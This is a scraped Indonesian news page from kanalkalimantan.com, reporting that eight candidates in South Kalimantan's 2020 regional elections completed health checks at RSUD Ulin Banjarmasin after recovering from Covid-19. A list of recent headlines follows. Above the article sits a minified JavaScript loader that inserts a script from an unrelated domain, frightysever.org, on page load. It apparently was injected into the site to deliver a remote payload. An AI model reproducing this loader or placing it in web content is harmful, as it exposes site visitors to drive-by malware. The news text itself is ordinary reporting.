(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Delapan Balon Kepala Daerah Tuntaskan Pemeriksaan Kesehatan


KANALKALIMANTAN.COM, BANJARMASIN – Tahap pemeriksaan kesehatan bagi bakal calon (balon) kepala daerah di Pilkada Kalimantan Selatan telah rampung. Seluruh bakal calon yang sebelumnya menunda tahapan pemeriksaan kesehatan oleh tim dokter telah mengikuti tahapan.

Hal itu disampaikan langsung oleh Wakil Direktur RSUD Ulin Banjarmasin, dr Among Wibowo di ruang Medical Check Up (MCU) di Lantai 4 Gedung RSUD Ulin Banjarmasin, Jumat (18/9/2020) siang.

“Hari ini Alhamdulillah telah selesai dilaksanakan pemeriksaan kesehatan bagi seluruh bakal calon yang telah dilaksanakan sejak pagi kemarin,” kata dr Among.

Sehingga hari ini diserahkan surat keterangan dari RSUD Ulin kepada masing-masing bakal calon bahwa mereka telah selesai melaksanakan seluruh rangkaian tahap tes kesehatan.

Menurut Among, sejak Kamis (17/9/2020) kemarin, tim dokter telah melakukan tes kesehatan gelombang kedua terhadap delapan bakal calon kepala daerah yang sebelumnya terpaksa menunda tahapan tersebut akibat dinyatakan positif terpapar Covid-19.

“Empat orang telah menyelesaikan pemeriksaannya pada siang kemarin, dan hari ini terakhir juga empat orang yang telah selesai. Jadi total ada delapan orang yang telah menyelesaikan tes kesehatan gelombang kedua,” jelasnya.

Menurutnya, selesainya tahapan pemeriksaan kesehatan tersebut menandakan bahwa kedelapan bakal calon kepala daerah yang kemarin dinyatakan terkonfirmasi positif Covid-19 itu telah dinyatakan sehat. Serta, memenuhi syarat untuk melanjutkan tahapan yang sudah ditentukan KPU Kalsel.

“Memang benar sebelumnya mereka yang ikut tes kesehatan di gelombang kedua ini terkonfirmasi positif Covid-19, tapi setelah dilakukan pemeriksaan oleh dokter paru, seluruhnya dinyatakan sehat dan berhak mengikuti tes kesehatan,” beber Among.

Untuk hasil pemeriksaannya sendiri, ia melanjutkan, pihaknya akan melakukan rapat internal terlebih dahulu dengan tim yang memeriksa. Seperti Badan Narkotika Nasional (BNN) Ikatan Dokter Indonesia (IDI), Himpunan Psikologi Indonesia (HIMPSI) beserta pihak RSUD Ulin pada Senin (21/9/2020) mendatang.

“Setelah itu baru kita serahkan hasilnya ke KPU Provinsi Kalsel,” tukasnya.

Dokter spesialis syaraf ini mengaku belum bisa membeberkan secara gamblang untuk hasil pemeriksaan tersebut kepada awak media. “Ini kan baru selesai, tentunya kita harus rapatkan terlebih dahulu baru bisa mengetahui apa hasilnya,” tandasnya.

Sebelumnya, diketahui beberapa waktu yang lalu, sedikitnya delapan bakal calon kepala daerah yang berlaga dalam lima Pilkada di Kalsel, terpaksa menunda tahapan pemeriksaan kesehatan oleh tim dokter lantaran dinyatakan terkonfirmasi positif Covid-19. Sehingga, mereka harus menjalani isolasi mandiri terlebih dahulu selama 10 hari untuk bisa melanjutkan tahapan tersebut untuk memastikan yang bersangkutan sudah terbebas dari paparan Covid-19. (kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : Bie

Al Ghifari

Recent Posts

Sejarah 1 Mei 1952 : Dari Afdeeling Amoentai Menjadi Kabupaten Hulu Sungai Utara

KANALKALIMANTAN.COM, AMUNTAI - Tepat hari ini Rabu 1 Mei 2024, 72 tahun silam atau tepatnya… Read More

2 menit ago

PLN Gelar Halalbihalal Bersama Anak-anak Panti Asuhan

KANALKALIMANTAN.COM, PONTIANAK - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

1 jam ago

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

13 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

14 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

15 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

16 jam ago

This website uses cookies.